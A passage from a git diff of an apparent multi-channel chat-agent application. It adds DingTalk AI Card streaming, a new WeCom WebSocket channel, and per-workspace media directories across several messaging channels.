(now_ms - card.last_updated) + < AI_CARD_STREAM_MIN_INTERVAL_SECONDS * 1000 + ): + return False + + if ( + now_ms - card.created_at + ) > AI_CARD_TOKEN_PREEMPTIVE_REFRESH_SECONDS * 1000: + card.access_token = await self._get_access_token() + + payload = { + "outTrackId": card.card_instance_id, + "guid": str(uuid4()), + "key": self.card_template_key, + "content": content, + "isFull": True, + "isFinalize": finalize, + "isError": False, + } + url = "https://api.dingtalk.com/v1.0/card/streaming" + + async def _do_stream(token: str): + headers = { + "Content-Type": "application/json", + "x-acs-dingtalk-access-token": token, + } + logger.info( + "dingtalk stream ai card: conversation_id=%s finalize=%s " + "content_len=%s", + card.conversation_id, + finalize, + len(content), + ) + async with self._http.put( + url, + json=payload, + headers=headers, + ) as resp: + txt = await resp.text() + logger.info( + "dingtalk stream ai card response:" + " status=%s finalize=%s body=%s", + resp.status, + finalize, + txt[:1000], + ) + return resp.status, txt + + status, txt = await _do_stream(card.access_token) + if status == 401: + card.access_token = await self._get_access_token() + status, txt = await _do_stream(card.access_token) + + if status >= 400: + if status == 500 and "unknownError" in txt: + raise RuntimeError( + "dingtalk ai card unknownError:" + " card_template_key mismatch?", + ) + raise RuntimeError( + f"stream ai card failed status={status} body={txt[:500]}", + ) + logger.info( + "dingtalk stream ai card ok: conversation_id=%s finalize=%s", + card.conversation_id, + finalize, + ) + + card.last_streamed_content = content + card.last_updated = int(time.time() * 1000) + if finalize: + card.state = FINISHED + async with self._active_cards_lock: + self._active_cards.pop(card.conversation_id, None) + self._card_store.save(self._active_cards) + elif card.state == PROCESSING: + card.state = INPUTING + await self._save_active_cards() + return True + + async def _finish_ai_card( + self, + conversation_id: str, + final_content: str, + ) -> bool: + async with self._active_cards_lock: + card = self._active_cards.get(conversation_id) + if not card: + return False + return await self._stream_ai_card(card, final_content, finalize=True) + + async def _recover_active_cards(self) -> None: + if not self._ai_card_enabled() or self._http is None: + return + records = self._card_store.load() + if not records: + return + token = await self._get_access_token() + for item in records: + state = str(item.get("state") or "") + if state in (FINISHED, FAILED): + continue + conversation_id = item.get("conversation_id") or "" + card_id = item.get("card_instance_id") or f"card_{uuid4()}" + if not conversation_id: + continue + card = ActiveAICard( + card_instance_id=card_id, + access_token=token, + conversation_id=conversation_id, + account_id=item.get("account_id") or "default", + store_path=str(self._card_store.path), + created_at=int( + item.get("created_at") or int(time.time() * 1000), + ), + last_updated=int( + item.get("last_updated") or int(time.time() * 1000), + ), + state=state or PROCESSING, + last_streamed_content="", + ) + async with self._active_cards_lock: + self._active_cards[conversation_id] = card + try: + await self._stream_ai_card( + card, + AI_CARD_RECOVERY_FINAL_TEXT, + finalize=True, + ) + except Exception: + logger.exception("dingtalk ai card recovery finalize failed") + await self._mark_card_failed(conversation_id) + async def send( self, to_handle: str, diff --git a/src/copaw/app/channels/dingtalk/constants.py b/src/copaw/app/channels/dingtalk/constants.py index 1ce1e40e1..de572c8cb 100644 --- a/src/copaw/app/channels/dingtalk/constants.py +++ b/src/copaw/app/channels/dingtalk/constants.py @@ -3,10 +3,14 @@ # When consumer sends all messages via sessionWebhook, process() skips reply SENT_VIA_WEBHOOK = "__SENT_VIA_WEBHOOK__" +SENT_VIA_AI_CARD = "__SENT_VIA_AI_CARD__" # Token cache TTL (1 hour) DINGTALK_TOKEN_TTL_SECONDS = 3600 +# Minimum interval between non-final AI Card updates. +AI_CARD_STREAM_MIN_INTERVAL_SECONDS = 0.6 + # Time debounce (300ms) DINGTALK_DEBOUNCE_SECONDS = 0.3 @@ -16,4 +20,9 @@ # DingTalk message type to runtime content type DINGTALK_TYPE_MAPPING = { "picture": "image", + "voice": "audio", } + +AI_CARD_TOKEN_PREEMPTIVE_REFRESH_SECONDS = 90 * 60 +AI_CARD_PROCESSING_TEXT = "处理中..." +AI_CARD_RECOVERY_FINAL_TEXT = "⚠️ 上一次回复处理中断,已自动结束。请重新发送你的问题。" diff --git a/src/copaw/app/channels/dingtalk/content_utils.py b/src/copaw/app/channels/dingtalk/content_utils.py index 12d18d9cd..4caf2270a 100644 --- a/src/copaw/app/channels/dingtalk/content_utils.py +++ b/src/copaw/app/channels/dingtalk/content_utils.py @@ -10,7 +10,7 @@ from urllib.parse import parse_qs, urlparse from agentscope_runtime.engine.schemas.agent_schemas import ( - # AudioContent, + AudioContent, FileContent, ImageContent, VideoContent, @@ -37,13 +37,10 @@ def dingtalk_content_from_type(mapped: str, url: str) -> Any: if mapped == "video": return VideoContent(type=ContentType.VIDEO, video_url=url) if mapped == "audio": - # Use subtype only: runtime prefixes with "audio/" -> "audio/amr". - # TODO: change to audio block when as support amr - return FileContent( - type=ContentType.FILE, - file_url=url, - # data=url, - # format="amr", + return AudioContent( + type=ContentType.AUDIO, + data=url, + format="amr", ) return FileContent(type=ContentType.FILE, file_url=url) diff --git a/src/copaw/app/channels/dingtalk/handler.py b/src/copaw/app/channels/dingtalk/handler.py index b96d77843..cf6e2bef2 100644 --- a/src/copaw/app/channels/dingtalk/handler.py +++ b/src/copaw/app/channels/dingtalk/handler.py @@ -15,7 +15,7 @@ from ..base import ContentType -from .constants import SENT_VIA_WEBHOOK +from .constants import SENT_VIA_AI_CARD, SENT_VIA_WEBHOOK from .content_utils import ( conversation_id_from_chatbot_message, conversation_type_from_chatbot_message, @@ -121,12 +121,14 @@ def _parse_rich_content( # Text may be under "text" or "content" (API variation). item_text = item.get("text") or item.get("content") if item_text is not None: - content.append( - TextContent( - type=ContentType.TEXT, - text=(item_text or "").strip(), - ), - ) + stripped = (item_text or "").strip() + if stripped: + content.append( + TextContent( + type=ContentType.TEXT, + text=stripped, + ), + ) # Picture items may use pictureDownloadCode or downloadCode. dl_code = ( item.get("downloadCode") @@ -260,6 +262,13 @@ async def process(self, callback: CallbackMessage) -> tuple[int, str]: "reply_loop": loop, "conversation_type": conversation_type, "is_group": is_group, + "sender_staff_id": getattr( + incoming_message, + "sender_staff_id", + None, + ) + or getattr(incoming_message, "senderStaffId", None) + or "", } if is_bot_mentioned: meta["bot_mentioned"] = True @@ -335,7 +344,10 @@ async def process(self, callback: CallbackMessage) -> tuple[int, str]: self._emit_native_threadsafe(native) response_text = await reply_future - if response_text == SENT_VIA_WEBHOOK: + if response_text == SENT_VIA_AI_CARD: + logger.info("sent to=%s via ai card", sender) + self.reply_text(" ", incoming_message) + elif response_text == SENT_VIA_WEBHOOK: logger.info( "sent to=%s via sessionWebhook (multi-message)", sender, diff --git a/src/copaw/app/channels/discord_/channel.py b/src/copaw/app/channels/discord_/channel.py index dbbd533df..6400ff2fd 100644 --- a/src/copaw/app/channels/discord_/channel.py +++ b/src/copaw/app/channels/discord_/channel.py @@ -283,26 +283,22 @@ def from_config( require_mention=config.require_mention, ) - async def _resolve_target(self, to_handle, meta): + async def _resolve_target(self, to_handle, _meta): """Resolve a Discord Messageable from meta or to_handle.""" - meta = meta or {} - if not meta.get("channel_id") and not meta.get("user_id"): - meta.update(self._route_from_handle(to_handle)) - channel_id = meta.get("channel_id") - user_id = meta.get("user_id") + route = self._route_from_handle(to_handle) + channel_id = route.get("channel_id") + user_id = route.get("user_id") if channel_id: - ch = self._client.get_channel(int(channel_id)) + cid = int(channel_id) + ch = self._client.get_channel(cid) if ch is None: - ch = await self._client.fetch_channel( - int(channel_id), - ) + ch = await self._client.fetch_channel(cid) return ch if user_id: - user = self._client.get_user(int(user_id)) + uid = int(user_id) + user = self._client.get_user(uid) if user is None: - user = await self._client.fetch_user( - int(user_id), - ) + user = await self._client.fetch_user(uid) return user.dm_channel or await user.create_dm() return None diff --git a/src/copaw/app/channels/feishu/channel.py b/src/copaw/app/channels/feishu/channel.py index 106287757..54051a077 100644 --- a/src/copaw/app/channels/feishu/channel.py +++ b/src/copaw/app/channels/feishu/channel.py @@ -37,6 +37,7 @@ from ....config.config import FeishuConfig as FeishuChannelConfig from ....config.utils import get_config_path +from ....constant import DEFAULT_MEDIA_DIR from ..base import ( BaseChannel, ContentType, @@ -161,7 +162,8 @@ def __init__( bot_prefix: str, encrypt_key: str = "", verification_token: str = "", - media_dir: str = "~/.copaw/media", + media_dir: str = "", + workspace_dir: Path | None = None, on_reply_sent: OnReplySent = None, show_tool_details: bool = True, filter_tool_messages: bool = False, @@ -190,7 +192,17 @@ def __init__( self.bot_prefix = bot_prefix self.encrypt_key = encrypt_key or "" self.verification_token = verification_token or "" - self._media_dir = Path(media_dir).expanduser() + self._workspace_dir = ( + Path(workspace_dir).expanduser() if workspace_dir else None + ) + # Use workspace-specific media dir if workspace_dir is provided + if not media_dir and self._workspace_dir: + self._media_dir = self._workspace_dir / "media" + elif media_dir: + self._media_dir = Path(media_dir).expanduser() + else: + self._media_dir = DEFAULT_MEDIA_DIR + self._media_dir.mkdir(parents=True, exist_ok=True) self._client: Any = None self._ws_client: Any = None @@ -235,7 +247,7 @@ def from_env( bot_prefix=os.getenv("FEISHU_BOT_PREFIX", "[BOT] "), encrypt_key=os.getenv("FEISHU_ENCRYPT_KEY", ""), verification_token=os.getenv("FEISHU_VERIFICATION_TOKEN", ""), - media_dir=os.getenv("FEISHU_MEDIA_DIR", "~/.copaw/media"), + media_dir=os.getenv("FEISHU_MEDIA_DIR", ""), on_reply_sent=on_reply_sent, dm_policy=os.getenv("FEISHU_DM_POLICY", "open"), group_policy=os.getenv("FEISHU_GROUP_POLICY", "open"), @@ -253,6 +265,7 @@ def from_config( show_tool_details: bool = True, filter_tool_messages: bool = False, filter_thinking: bool = False, + workspace_dir: Path | None = None, ) -> "FeishuChannel": return cls( process=process, @@ -262,7 +275,8 @@ def from_config( bot_prefix=config.bot_prefix or "[BOT] ", encrypt_key=config.encrypt_key or "", verification_token=config.verification_token or "", - media_dir=config.media_dir or "~/.copaw/media", + media_dir=config.media_dir or "", + workspace_dir=workspace_dir, on_reply_sent=on_reply_sent, show_tool_details=show_tool_details, filter_tool_messages=filter_tool_messages, @@ -998,7 +1012,12 @@ async def _download_file_resource( def _receive_id_store_path(self) -> Path: """ Path to persist receive_id mapping (for cron to resolve after restart). + + Uses agent workspace directory if available, otherwise falls back + to global config directory for backward compatibility. """ + if self._workspace_dir: + return self._workspace_dir / "feishu_receive_ids.json" return get_config_path().parent / "feishu_receive_ids.json" def _load_receive_id_store_from_disk(self) -> None: diff --git a/src/copaw/app/channels/imessage/channel.py b/src/copaw/app/channels/imessage/channel.py index bf4d4f0fd..e4f312208 100644 --- a/src/copaw/app/channels/imessage/channel.py +++ b/src/copaw/app/channels/imessage/channel.py @@ -21,6 +21,7 @@ ) from ....config.config import IMessageChannelConfig +from ....constant import DEFAULT_MEDIA_DIR from ..utils import file_url_to_local_path from ....agents.utils.file_handling import download_file_from_url @@ -44,7 +45,7 @@ def __init__( db_path: str, poll_sec: float, bot_prefix: str, - media_dir: str = "~/.copaw/media", + media_dir: str = "", max_decoded_size: int = 10 * 1024 * 1024, # 10MB default on_reply_sent: OnReplySent = None, show_tool_details: bool = True, @@ -64,7 +65,9 @@ def __init__( self.bot_prefix = bot_prefix # Create media directory for downloaded files - self._media_dir = Path(media_dir).expanduser() + self._media_dir = ( + Path(media_dir).expanduser() if media_dir else DEFAULT_MEDIA_DIR + ) self._media_dir.mkdir(parents=True, exist_ok=True) # Base64 data size limit @@ -89,7 +92,7 @@ def from_env( ), poll_sec=float(os.getenv("IMESSAGE_POLL_SEC", "1.0")), bot_prefix=os.getenv("IMESSAGE_BOT_PREFIX", "[BOT] "), - media_dir=os.getenv("IMESSAGE_MEDIA_DIR", "~/.copaw/media"), + media_dir=os.getenv("IMESSAGE_MEDIA_DIR", ""), max_decoded_size=int( os.getenv("IMESSAGE_MAX_DECODED_SIZE", "10485760"), ), # 10MB @@ -112,7 +115,7 @@ def from_config( db_path=config.db_path or "~/Library/Messages/chat.db", poll_sec=config.poll_sec, bot_prefix=config.bot_prefix or "[BOT] ", - media_dir=config.media_dir or "~/.copaw/media", + media_dir=config.media_dir if config.media_dir else "", max_decoded_size=config.max_decoded_size, on_reply_sent=on_reply_sent, show_tool_details=show_tool_details, diff --git a/src/copaw/app/channels/manager.py b/src/copaw/app/channels/manager.py index 41184b08b..02d4b6306 100644 --- a/src/copaw/app/channels/manager.py +++ b/src/copaw/app/channels/manager.py @@ -7,6 +7,7 @@ import asyncio import logging +from pathlib import Path from typing import ( Callable, @@ -159,8 +160,16 @@ def from_config( process: ProcessHandler, config: "Config", on_last_dispatch: OnLastDispatch = None, + workspace_dir: Path | None = None, ) -> "ChannelManager": - """Create channels from config (config.json).""" + """Create channels from config (config.json or agent.json). + + Args: + process: Process handler for agent communication + config: Configuration object with channels + on_last_dispatch: Callback for dispatch events + workspace_dir: Agent workspace directory for channel state files + """ available = get_available_channels() ch = config.channels show_tool_details = getattr(config, "show_tool_details", True) @@ -180,6 +189,12 @@ def from_config( ) if ch_cfg is None: continue + + # Check if channel is enabled + enabled = getattr(ch_cfg, "enabled", False) + if not enabled: + continue + filter_tool_messages = getattr( ch_cfg, "filter_tool_messages", @@ -190,16 +205,26 @@ def from_config( "filter_thinking", False, ) - channels.append( - ch_cls.from_config( - process, - ch_cfg, - on_reply_sent=on_last_dispatch, - show_tool_details=show_tool_details, - filter_tool_messages=filter_tool_messages, - filter_thinking=filter_thinking, - ), - ) + + # Pass workspace_dir to channel if supported + from_config_kwargs = { + "process": process, + "config": ch_cfg, + "on_reply_sent": on_last_dispatch, + "show_tool_details": show_tool_details, + "filter_tool_messages": filter_tool_messages, + "filter_thinking": filter_thinking, + } + + # Only pass workspace_dir to channels that support it + import inspect + + sig = inspect.signature(ch_cls.from_config) + if "workspace_dir" in sig.parameters: + from_config_kwargs["workspace_dir"] = workspace_dir + + channels.append(ch_cls.from_config(**from_config_kwargs)) + return cls(channels) def _make_enqueue_cb(self, channel_id: str) -> Callable[[Any], None]: diff --git a/src/copaw/app/channels/mattermost/channel.py b/src/copaw/app/channels/mattermost/channel.py index 3d9f4954b..a77ef88ed 100644 --- a/src/copaw/app/channels/mattermost/channel.py +++ b/src/copaw/app/channels/mattermost/channel.py @@ -20,6 +20,7 @@ ) from ....config.config import MattermostConfig as MattermostChannelConfig +from ....constant import WORKING_DIR from ..base import ( BaseChannel, OnReplySent, @@ -31,7 +32,7 @@ MATTERMOST_POST_CHUNK_SIZE = 4000 # chars per post (hard limit ~16383) -_DEFAULT_MEDIA_DIR = Path("~/.copaw/media/mattermost").expanduser() +_DEFAULT_MEDIA_DIR = WORKING_DIR / "media" / "mattermost" _TYPING_TIMEOUT_S = 180 _IMAGE_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif", ".webp", ".bmp", ".tiff"} diff --git a/src/copaw/app/channels/qq/channel.py b/src/copaw/app/channels/qq/channel.py index 3314139bd..9f2c426d7 100644 --- a/src/copaw/app/channels/qq/channel.py +++ b/src/copaw/app/channels/qq/channel.py @@ -35,6 +35,7 @@ ) from ....config.config import QQConfig as QQChannelConfig +from ....constant import WORKING_DIR from ..base import ( BaseChannel, @@ -73,7 +74,7 @@ _IMAGE_TAG_PATTERN = re.compile(r"\[Image: (https?://[^\]]+)\]", re.IGNORECASE) # Rich media paths -_DEFAULT_MEDIA_DIR = Path("~/.copaw/media/qq").expanduser() +_DEFAULT_MEDIA_DIR = WORKING_DIR / "media" / "qq" class QQApiError(RuntimeError): diff --git a/src/copaw/app/channels/registry.py b/src/copaw/app/channels/registry.py index 8cbd9d1b6..cddae6ce9 100644 --- a/src/copaw/app/channels/registry.py +++ b/src/copaw/app/channels/registry.py @@ -28,6 +28,8 @@ "console": (".console", "ConsoleChannel"), "matrix": (".matrix", "MatrixChannel"), "voice": (".voice", "VoiceChannel"), + "wecom": (".wecom", "WecomChannel"), + "xiaoyi": (".xiaoyi", "XiaoYiChannel"), } # Required channels must load; failures are raised, not skipped. diff --git a/src/copaw/app/channels/renderer.py b/src/copaw/app/channels/renderer.py index 035e7382b..0aa65e00f 100644 --- a/src/copaw/app/channels/renderer.py +++ b/src/copaw/app/channels/renderer.py @@ -44,6 +44,7 @@ class RenderStyle: use_emoji: bool = True filter_tool_messages: bool = False filter_thinking: bool = False + internal_tools: frozenset = frozenset() def _fmt_tool_call( @@ -192,11 +193,17 @@ def _parts_for_tool_output(content_list: list) -> List[_OutgoingPart]: ContentType.VIDEO, ContentType.FILE, ) - media_parts = [ - p - for p in block_parts - if getattr(p, "type", None) in media_types - ] + # Internal tools (e.g. view_image) produce + # media for the LLM, not the user — skip. + media_parts = ( + [] + if name in s.internal_tools + else [ + p + for p in block_parts + if getattr(p, "type", None) in media_types + ] + ) out.extend(media_parts) if not media_parts: out.append( @@ -265,6 +272,9 @@ def _parts_for_tool_output(content_list: list) -> List[_OutgoingPart]: if getattr(c, "type", None) != ContentType.DATA: continue data = getattr(c, "data", None) or {} + name = data.get("name") or "tool" + if name in s.internal_tools: + continue output = data.get("output", "") try: output = json.loads(output) diff --git a/src/copaw/app/channels/schema.py b/src/copaw/app/channels/schema.py index 11dd48157..f7dedd59e 100644 --- a/src/copaw/app/channels/schema.py +++ b/src/copaw/app/channels/schema.py @@ -38,6 +38,7 @@ def to_handle(self) -> str: "mqtt", "console", "voice", + "xiaoyi", ) # ChannelType is str to allow plugin channels; built-in set above. diff --git a/src/copaw/app/channels/telegram/channel.py b/src/copaw/app/channels/telegram/channel.py index de79b91f4..042f665b2 100644 --- a/src/copaw/app/channels/telegram/channel.py +++ b/src/copaw/app/channels/telegram/channel.py @@ -51,7 +51,7 @@ 50 * 1024 * 1024 ) # 50 MB – Telegram bot upload limit -_DEFAULT_MEDIA_DIR = Path("~/.copaw/media/telegram").expanduser() +_DEFAULT_MEDIA_DIR = WORKING_DIR / "media" / "telegram" _TYPING_TIMEOUT_S = 180 _RECONNECT_INITIAL_S = 2.0 @@ -278,6 +278,7 @@ def __init__( on_reply_sent: OnReplySent = None, show_tool_details: bool = True, media_dir: str = "", + workspace_dir: Path | None = None, show_typing: bool = True, filter_tool_messages: bool = False, filter_thinking: bool = False, @@ -307,6 +308,9 @@ def __init__( self._media_dir = ( Path(media_dir).expanduser() if media_dir else _DEFAULT_MEDIA_DIR ) + self._workspace_dir = ( + Path(workspace_dir).expanduser() if workspace_dir else None + ) self._show_typing = show_typing self._typing_tasks: dict[str, asyncio.Task] = {} self._task: Optional[asyncio.Task] = None @@ -485,6 +489,7 @@ def from_config( show_tool_details: bool = True, filter_tool_messages: bool = False, filter_thinking: bool = False, + workspace_dir: Path | None = None, ) -> "TelegramChannel": if isinstance(config, dict): c = config @@ -509,6 +514,7 @@ def _get_str(key: str) -> str: show_tool_details=show_tool_details, filter_tool_messages=filter_tool_messages, filter_thinking=filter_thinking, + workspace_dir=workspace_dir, show_typing=show_typing, dm_policy=c.get("dm_policy") or "open", group_policy=c.get("group_policy") or "open", @@ -784,7 +790,11 @@ async def _send_media_value( "Could not resolve media file from URL.", ) local_path = Path(raw_path).resolve() - allowed_root = (WORKING_DIR / "media").resolve() + allowed_root = ( + (self._workspace_dir / "media").resolve() + if self._workspace_dir + else (WORKING_DIR / "media").resolve() + ) if not local_path.is_relative_to(allowed_root): logger.error( "telegram: blocked media outside allowed directory: %s", diff --git a/src/copaw/app/channels/wecom/__init__.py b/src/copaw/app/channels/wecom/__init__.py new file mode 100644 index 000000000..32a770d63 --- /dev/null +++ b/src/copaw/app/channels/wecom/__init__.py @@ -0,0 +1,6 @@ +# -*- coding: utf-8 -*- +"""WeCom (Enterprise WeChat) channel package.""" + +from .channel import WecomChannel + +__all__ = ["WecomChannel"] diff --git a/src/copaw/app/channels/wecom/channel.py b/src/copaw/app/channels/wecom/channel.py new file mode 100644 index 000000000..87923f14a --- /dev/null +++ b/src/copaw/app/channels/wecom/channel.py @@ -0,0 +1,812 @@ +# -*- coding: utf-8 -*- +# pylint: disable=too-many-statements,too-many-branches +# pylint: disable=too-many-return-statements,too-many-instance-attributes +# pylint: disable=too-many-nested-blocks +"""WeCom (Enterprise WeChat) Channel. + +Uses the aibot WebSocket SDK to receive messages from WeCom AI Bot. +Sends replies via the same WebSocket channel using stream mode +(reply_stream). Supports text, image, voice, file, and mixed messages. +""" + +from __future__ import annotations + +import asyncio +import hashlib +import logging +import os +import sys +import threading +from collections import OrderedDict +from pathlib import Path +from typing import Any, Dict, List, Optional + +from agentscope_runtime.engine.schemas.agent_schemas import ( + AgentRequest, + FileContent, + ImageContent, + TextContent, +) +from aibot import WSClient, WSClientOptions, generate_req_id + +from ....constant import DEFAULT_MEDIA_DIR +from ..base import ( + BaseChannel, + ContentType, + OnReplySent, + OutgoingContentPart, + ProcessHandler, +) +from .utils import format_markdown_tables + +logger = logging.getLogger(__name__) + +# Max number of processed message_ids to keep for dedup. +_WECOM_PROCESSED_IDS_MAX = 2000 + + +class WecomChannel(BaseChannel): + """WeCom AI Bot channel: WebSocket receive and send. + + Session: for single-chat session_id = wecom:, for group-chat + wecom:group:. The frame from the SDK is stored in meta so + we can call reply_stream back through the same connection. + """ + + channel = "wecom" + + def __init__( + self, + process: ProcessHandler, + enabled: bool, + bot_id: str, + secret: str, + bot_prefix: str = "[BOT] ", + media_dir: str = "", + welcome_text: str = "", + on_reply_sent: OnReplySent = None, + show_tool_details: bool = True, + filter_tool_messages: bool = False, + filter_thinking: bool = False, + dm_policy: str = "open", + group_policy: str = "open", + allow_from: Optional[List[str]] = None, + deny_message: str = "", + max_reconnect_attempts: int = -1, + ): + super().__init__( + process, + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + dm_policy=dm_policy, + group_policy=group_policy, + allow_from=allow_from, + deny_message=deny_message, + ) + self.enabled = enabled + self.bot_id = bot_id + self.secret = secret + self.bot_prefix = bot_prefix + self.welcome_text = welcome_text + self._media_dir = ( + Path(media_dir).expanduser() if media_dir else DEFAULT_MEDIA_DIR + ) + self._max_reconnect_attempts = max_reconnect_attempts + + self._client: Any = None + self._loop: Optional[asyncio.AbstractEventLoop] = None + self._ws_thread: Optional[threading.Thread] = None + + # message_id dedup (ordered dict, trimmed when over limit) + self._processed_message_ids: OrderedDict[str, None] = OrderedDict() + self._processed_ids_lock = threading.Lock() + + @classmethod + def from_env( + cls, + process: ProcessHandler, + on_reply_sent: OnReplySent = None, + ) -> "WecomChannel": + allow_from_env = os.getenv("WECOM_ALLOW_FROM", "") + allow_from = ( + [s.strip() for s in allow_from_env.split(",") if s.strip()] + if allow_from_env + else [] + ) + return cls( + process=process, + enabled=os.getenv("WECOM_CHANNEL_ENABLED", "0") == "1", + bot_id=os.getenv("WECOM_BOT_ID", ""), + secret=os.getenv("WECOM_SECRET", ""), + bot_prefix=os.getenv("WECOM_BOT_PREFIX", "[BOT] "), + media_dir=os.getenv("WECOM_MEDIA_DIR", ""), + on_reply_sent=on_reply_sent, + dm_policy=os.getenv("WECOM_DM_POLICY", "open"), + group_policy=os.getenv("WECOM_GROUP_POLICY", "open"), + allow_from=allow_from, + deny_message=os.getenv("WECOM_DENY_MESSAGE", ""), + max_reconnect_attempts=int( + os.getenv("WECOM_MAX_RECONNECT_ATTEMPTS", "-1"), + ), + ) + + @classmethod + def from_config( + cls, + process: ProcessHandler, + config: Any, + on_reply_sent: OnReplySent = None, + show_tool_details: bool = True, + filter_tool_messages: bool = False, + filter_thinking: bool = False, + ) -> "WecomChannel": + return cls( + process=process, + enabled=getattr(config, "enabled", False), + bot_id=getattr(config, "bot_id", "") or "", + secret=getattr(config, "secret", "") or "", + bot_prefix=getattr(config, "bot_prefix", "[BOT] ") or "[BOT] ", + media_dir=getattr(config, "media_dir", None) or "", + welcome_text=getattr(config, "welcome_text", "") or "", + on_reply_sent=on_reply_sent, + show_tool_details=show_tool_details, + filter_tool_messages=filter_tool_messages, + filter_thinking=filter_thinking, + dm_policy=getattr(config, "dm_policy", "open") or "open", + group_policy=getattr(config, "group_policy", "open") or "open", + allow_from=getattr(config, "allow_from", []) or [], + deny_message=getattr(config, "deny_message", "") or "", + max_reconnect_attempts=int( + -1 + if getattr(config, "max_reconnect_attempts", None) is None + else getattr(config, "max_reconnect_attempts"), + ), + ) + + # ------------------------------------------------------------------ + # Session / handle helpers + # ------------------------------------------------------------------ + + def resolve_session_id( + self, + sender_id: str, + channel_meta: Optional[Dict[str, Any]] = None, + ) -> str: + """Build session_id from meta or sender_id.""" + meta = channel_meta or {} + chatid = (meta.get("wecom_chatid") or "").strip() + chat_type = (meta.get("wecom_chat_type") or "single").strip() + if chat_type == "group" and chatid: + return f"wecom:group:{chatid}" + if sender_id: + return f"wecom:{sender_id}" + return f"wecom:{chatid or 'unknown'}" + + @staticmethod + def _parse_chatid_from_handle(to_handle: str) -> str: + """Extract chatid/userid from a to_handle string. + + - ``wecom:group:`` → ```` + - ``wecom:`` → ```` + """ + h = (to_handle or "").strip() + if h.startswith("wecom:group:"): + return h[len("wecom:group:") :] + if h.startswith("wecom:"): + return h[len("wecom:") :] + return h + + def to_handle_from_target(self, *, user_id: str, session_id: str) -> str: + """Return send handle; session_id takes priority.""" + return session_id or f"wecom:{user_id}" + + def get_to_handle_from_request(self, request: Any) -> str: + session_id = getattr(request, "session_id", "") or "" + user_id = getattr(request, "user_id", "") or "" + return session_id or f"wecom:{user_id}" + + def get_on_reply_sent_args( + self, + request: Any, + to_handle: str, + ) -> tuple: + return ( + getattr(request, "user_id", "") or "", + getattr(request, "session_id", "") or "", + ) + + def build_agent_request_from_native( + self, + native_payload: Any, + ) -> "AgentRequest": + """Build AgentRequest from a wecom native dict.""" + payload = native_payload if isinstance(native_payload, dict) else {} + channel_id = payload.get("channel_id") or self.channel + sender_id = payload.get("sender_id") or "" + content_parts = payload.get("content_parts") or [] + meta = payload.get("meta") or {} + session_id = payload.get("session_id") or self.resolve_session_id( + sender_id, + meta, + ) + user_id = payload["user_id"] if "user_id" in payload else sender_id + request = self.build_agent_request_from_user_content( + channel_id=channel_id, + sender_id=user_id, + session_id=session_id, + content_parts=content_parts, + channel_meta=meta, + ) + setattr(request, "channel_meta", meta) + return request + + def merge_native_items(self, items: List[Any]) -> Any: + """Merge same-session native payloads: concat content_parts.""" + if not items: + return None + first = items[0] if isinstance(items[0], dict) else {} + merged_parts: List[Any] = [] + for it in items: + p = it if isinstance(it, dict) else {} + merged_parts.extend(p.get("content_parts") or []) + last = items[-1] if isinstance(items[-1], dict) else {} + return { + "channel_id": first.get("channel_id") or self.channel, + "sender_id": last.get( + "sender_id", + first.get("sender_id", ""), + ), + "user_id": last.get("user_id", first.get("user_id", "")), + "session_id": last.get( + "session_id", + first.get("session_id", ""), + ), + "content_parts": merged_parts, + "meta": dict(last.get("meta") or {}), + } + + # ------------------------------------------------------------------ + # Message dedup helper + # ------------------------------------------------------------------ + + def _is_duplicate(self, msg_id: str) -> bool: + """Return True if msg_id was already seen; record it.""" + with self._processed_ids_lock: + if msg_id in self._processed_message_ids: + return True + self._processed_message_ids[msg_id] = None + while len(self._processed_message_ids) > _WECOM_PROCESSED_IDS_MAX: + self._processed_message_ids.popitem(last=False) + return False + + # ------------------------------------------------------------------ + # Incoming message handlers (called from WS thread, dispatch to loop) + # ------------------------------------------------------------------ + + def _on_message_sync(self, frame: Any) -> None: + """Sync handler called from SDK event; dispatches to async loop.""" + if not self._loop or not self._loop.is_running(): + logger.warning("wecom: main loop not set/running, drop message") + return + asyncio.run_coroutine_threadsafe( + self._on_message(frame), + self._loop, + ) + + async def _on_message(self, frame: Any) -> None: + """Parse and enqueue one incoming message.""" + try: + body = frame.get("body") or {} + msgtype = body.get("msgtype") or "" + sender_id = (body.get("from") or {}).get("userid", "") + chatid = body.get("chatid", "") + chat_type = body.get("chattype", "single") + + # Build unique message id for dedup + msg_id = ( + body.get("msgid") or "" + ) or f"{sender_id}_{body.get('send_time', '')}" + if msg_id and self._is_duplicate(msg_id): + return + + content_parts: List[Any] = [] + text_parts: List[str] = [] + + if msgtype == "text": + text = (body.get("text") or {}).get("content", "").strip() + if text: + text_parts.append(text) + + elif msgtype == "image": + img_info = body.get("image") or {} + url = img_info.get("url") or "" + aes_key = img_info.get("aeskey") or "" + if url: + path = await self._download_media( + url, + aes_key=aes_key, + filename_hint="image.jpg", + ) + if path: + content_parts.append( + ImageContent( + type=ContentType.IMAGE, + image_url=path, + ), + ) + else: + text_parts.append("[image: download failed]") + else: + text_parts.append("[image: no url]") + + elif msgtype == "voice": + voice_info = body.get("voice") or {} + # Use ASR text from WeCom; no need to download audio + asr_text = voice_info.get("content", "").strip() + if asr_text: + text_parts.append(asr_text) + else: + text_parts.append("[voice: no text]") + + elif msgtype == "file": + file_info = body.get("file") or {} + url = file_info.get("url") or "" + aes_key = file_info.get("aeskey") or "" + filename = file_info.get("filename") or "file.bin" + if url: + path = await self._download_media( + url, + aes_key=aes_key, + filename_hint=filename, + ) + if path: + content_parts.append( + FileContent( + type=ContentType.FILE, + file_url=path, + ), + ) + else: + text_parts.append("[file: download failed]") + else: + text_parts.append("[file: no url]") + + elif msgtype == "mixed": + # Mixed: list of items, each has msgtype, text or image + mixed_items = body.get("mixed", {}).get("msg_item", []) + for item in mixed_items: + itype = item.get("msgtype") or "" + if itype == "text": + t = item.get("text", {}).get("content", "").strip() + if t: + text_parts.append(t) + elif itype == "image": + img = item.get("image") or {} + url = img.get("url") or "" + aes_key = img.get("aeskey") or "" + if url: + path = await self._download_media( + url, + aes_key=aes_key, + filename_hint="image.jpg", + ) + if path: + content_parts.append( + ImageContent( + type=ContentType.IMAGE, + image_url=path, + ), + ) + else: + text_parts.append("[image: download failed]") + else: + text_parts.append(f"[{msgtype}]") + + text = "\n".join(text_parts).strip() + if text: + content_parts.insert( + 0, + TextContent(type=ContentType.TEXT, text=text), + ) + if not content_parts: + return + + is_group = chat_type == "group" + meta: Dict[str, Any] = { + "wecom_sender_id": sender_id, + 